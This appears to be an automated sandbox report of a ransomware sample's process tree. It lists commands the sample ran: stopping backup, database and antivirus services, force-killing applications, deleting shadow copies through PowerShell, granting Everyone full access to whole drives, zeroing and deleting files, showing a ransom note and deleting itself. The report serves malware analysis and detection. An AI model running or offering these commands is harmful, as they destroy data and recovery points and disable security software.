C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y2⤵PID:2792
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y3⤵PID:2252
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:2456
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵PID:4788
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKey /y2⤵PID:1760
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKey /y3⤵PID:6036
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mssql$vim_sqlexp /y2⤵PID:2752
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssql$vim_sqlexp /y3⤵PID:2300
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McTaskManager /y2⤵PID:2136
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McTaskManager /y3⤵PID:3592
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:2928
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:3584
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop OracleClientCache80 /y2⤵PID:936
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y3⤵PID:5384
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y2⤵PID:2540
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y3⤵PID:3628
-
-
-
C:\Windows\SysWOW64\arp.exe"arp" -a2⤵PID:2784
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SmcService /y2⤵PID:2636
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SmcService /y3⤵PID:4940
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MySQL80 /y2⤵PID:2828
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL80 /y3⤵PID:2952
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SntpService /y2⤵PID:3060
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SntpService /y3⤵PID:3624
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Safestore Service” /y2⤵PID:2580
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y3⤵PID:3632
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop audioendpointbuilder /y2⤵PID:2988
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y3⤵PID:2388
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$ECWDB2 /y2⤵PID:1996
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y3⤵PID:1492
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop vapiendpoint /y2⤵PID:3016
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y3⤵PID:2176
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop WRSVC /y2⤵PID:544
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WRSVC /y3⤵PID:2512
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y2⤵PID:2916
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y3⤵PID:3304
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKeyServiceHelper /y2⤵PID:1512
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y3⤵PID:320
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLTELEMETRY /y2⤵PID:1172
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y3⤵PID:2536
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKeyScheduler /y2⤵PID:2076
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y3⤵PID:2992
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLSERVERAGENT /y2⤵PID:1372
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y3⤵PID:2084
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLSafeOLRService /y2⤵PID:2876
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y3⤵PID:2844
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:2400
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:4896
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop tmlisten /y2⤵PID:3024
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop tmlisten /y3⤵PID:5584
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLBrowser /y2⤵PID:2736
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y3⤵PID:5832
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TmCCSF /y2⤵PID:1892
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TmCCSF /y3⤵PID:2264
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵PID:2272
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y3⤵PID:3588
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y2⤵PID:2584
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y3⤵PID:348
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y2⤵PID:2336
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y3⤵PID:2528
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y2⤵PID:1592
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y3⤵PID:820
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDeviceMediaService /y2⤵PID:1660
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y3⤵PID:2408
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos System Protection Service” /y2⤵PID:2412
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y3⤵PID:2428
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y2⤵PID:2332
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y3⤵PID:2280
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop svcGenericHost /y2⤵PID:1188
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y3⤵PID:3648
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SOPHOS /y2⤵PID:2628
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y3⤵PID:3644
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SQL_2008 /y2⤵PID:3056
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y3⤵PID:5048
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophossps /y2⤵PID:3020
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophossps /y3⤵PID:2588
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_update_64 /y2⤵PID:2724
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y3⤵PID:3324
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_update /y2⤵PID:1124
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_update /y3⤵PID:3572
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$TPSAMA /y2⤵PID:2196
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y3⤵PID:2812
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_service /y2⤵PID:2900
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_service /y3⤵PID:3348
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$TPS /y2⤵PID:2956
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y3⤵PID:2668
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_filter /y2⤵PID:2688
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_filter /y3⤵PID:3336
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DCAgent /y2⤵PID:2552
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DCAgent /y3⤵PID:2776
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SHAREPOINT /y2⤵PID:2800
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y3⤵PID:3396
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:660
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:2676
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EraserSvc11710 /y2⤵PID:2248
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y3⤵PID:5108
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Agent” /y2⤵PID:2452
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Agent” /y3⤵PID:3048
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sacsvr /y2⤵PID:2260
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sacsvr /y3⤵PID:2728
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeES /y2⤵PID:2092
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y3⤵PID:3412
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SOPHOS /y2⤵PID:2280
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y3⤵PID:3564
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Web Control Service” /y2⤵PID:2284
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y3⤵PID:4724
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y2⤵PID:2668
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y3⤵PID:3588
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:2440
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:3036
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sms_site_sql_backup /y2⤵PID:2296
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y3⤵PID:3628
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PROD /y2⤵PID:1064
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y3⤵PID:3524
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfevtp /y2⤵PID:2756
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfevtp /y3⤵PID:3540
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:1624
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:440
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y2⤵PID:2180
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y3⤵PID:3564
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵PID:2192
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:3168
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Antivirus /y2⤵PID:2224
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Antivirus /y3⤵PID:1796
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:2920
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:3652
-
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:764
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2464
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3080
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3088
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3096
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3112
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3104
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3128
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3120
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3148
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3156
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3140
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3172
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3180
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
PID:3196
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3188
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3212
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3204
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3228
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3236
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3220
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3244
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3268
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3260
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3252
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3276
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3292
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3308
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3284
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3372
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3380
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3364
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3356
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3404
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3436
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3444
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3428
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3468
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3452
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3476
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3484
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3500
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3492
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3508
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3516
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3532
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3556
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3580
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:3604
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:3612
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:3596
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.7.0.342⤵PID:5048
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:3764
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:2676
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:4060
-
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:2756
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe2⤵
- Deletes itself
PID:6008 -
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 33⤵PID:2760
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "395958801-8933661151793810850-158212092081090685311883140302228880-203348247"1⤵PID:1896
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1164146697-1757351519121954960-1598656531-194259269417710956351476371403917931529"1⤵PID:1120
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1872053314-1445472940324293419-21159644872012361511644811687233454261014497176"1⤵PID:772
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y1⤵PID:2252
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop macmnsvc /y1⤵PID:2152
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter /y1⤵PID:2252
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1997061358-1814872304457674714-448730642926788787392561543676311-1022516745"1⤵PID:2336
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-11808829151551623970477387295749141643-152999599157424081418553353751668623076"1⤵PID:2580
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1806817180-324525989-1350126046-42631602711286792791551640673-355785847-591603542"1⤵PID:2712
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1349524300-264491354-422650865-170000379-12372704311559823258693977574273300569"1⤵PID:2352
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2284102851750714218-17956263341356059538-68260397-1688964880437469013-1505944464"1⤵PID:2648
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-367323984289478961-400712025-5575469-1897964322-1857134293-1298701124-1890941733"1⤵PID:2680
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1101567333-772160772-62232171180505311-1027584156-493040275-8296030121660249177"1⤵PID:564
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-137596843016207695801466659247-788240315-1946335369-172572203719260333741454974235"1⤵PID:2172
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "901099379-1722020870805074732-851632885-1456233066-674386539-1419802802-1527311146"1⤵PID:2924
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "189307140238978187249660684893735857661344639-1720596160-2053468275-857941555"1⤵PID:2400
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-844076941-1092393732-1850109459-17565218082059912405-815250841-1429742881-713413756"1⤵PID:2068
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-68735326-5056036131313275624-2291945142893465241538636704-467938199613081133"1⤵PID:2964
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "683111131349876665-339622279-2105309224149161751542262906-987451766894225895"1⤵PID:1612
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "880083956-160111875-19419675551522892634-4900239171820484090-8918060321846682791"1⤵PID:2428
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1409441447-166358734011141505841170503562-53167424812792674551949113955417370641"1⤵PID:1796
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-11503997201525866783-2636398131806831343596679775-19656487391909011136-770565243"1⤵PID:2948
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1750091196-1541920400-2012754478-321385066-875635047-322969583-18022786051186940972"1⤵PID:2588
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "893441057-1530893456-352293957-1559822984-419533987-457585707769182777-1306135271"1⤵PID:2304
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1856244861-16479583311265349185-11306903041158274405-1576223994-3688727521460863706"1⤵PID:2200
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "244172938-1898520942810559031145472652-12320168231070488151-770320977-1578820010"1⤵PID:2600
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1518877750-1753057878-2920150211223463562-1176132614-4931925167650328561741883803"1⤵PID:1676
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-56209806-99784166420517067981251393499782245764148889861711332975201400665353"1⤵PID:2164
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
58KB
MD56045baccf49e1eba0e674945311a06e6
SHA1379c6234849eecede26fad192c2ee59e0f0221cb
SHA25665830a65cb913bee83258e4ac3e140faf131e7eb084d39f7020c7acc825b0a58
SHA512da32af6a730884e73956e4eb6bff61a1326b3ef8ba0a213b5b4aad6de4fbd471b3550b6ac2110f1d0b2091e33c70d44e498f897376f8e1998b1d2afac789abeb
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD506fcadd4009c49c3d024e7c3ff9ab157
SHA13540d151afcad25a99889ce1e4bf96c974ec8d61
SHA2565c4fa483a4aabfb34e53df4d44f76a9357e9da74394d0bb6f2cc692e929daea7
SHA512902eb5d61b0b06d2e5ac6fc946fb389e75c802f8b6128eb14b59b217d9af7fe4f55784141ee27a1fa37418f8f12c775e1141abf7401b4220e4fbd8fc9dc18bb9
-
Filesize
2KB
MD5063a2b596f25a80d12bc29c8809d01db
SHA13c953fbcf110a6d0d8e5bf85b836906a43d500d4
SHA25696e37cb15d0e47409c388c549336051976f082e29149f8503ace4be3069728ad
SHA5121edd687b2dc4886ff9a060bbea692204244efc6405c3a07b5fa5500afafb74a08879f6f7648c26cc5528adfe0eb5830a4badcb931a8a173c60f5e80b4f74d550
-
Filesize
815KB
MD5c590a84b8c72cf18f35ae166f815c9df
